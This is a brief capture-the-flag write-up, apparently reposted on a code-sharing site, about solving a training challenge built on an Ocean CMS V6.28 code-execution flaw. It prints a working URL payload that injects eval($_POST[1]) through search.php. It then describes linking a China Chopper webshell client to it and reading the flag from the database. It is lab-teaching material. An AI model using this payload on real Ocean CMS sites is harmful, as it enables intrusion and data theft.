"Baidu Cup" CTF Competition in September _Test (ocean cms front desk getshell)

Others 2022-04-21 22:05:37 views: 0

The topic is in the i spring and autumn ctf training camp

Another question about the common vulnerabilities of cms, go directly to Baidu to check the general vulnerabilities

Here I am using the following exploit:

Ocean CMS V6.28 code execution 0day

According to the given payload, directly access url+/search.php?searchtype=5&tid=&area=eval($_POST[1])

After connecting with kitchen knife, but at first glance there is no flag.php

 

Backhand to check the storage address of the database configuration file of the ocean cms:

 

Go out and use a kitchen knife to connect to the database

 

After editing, right-click the database management, you can see the flag

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=324620693&siteId=291194637
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com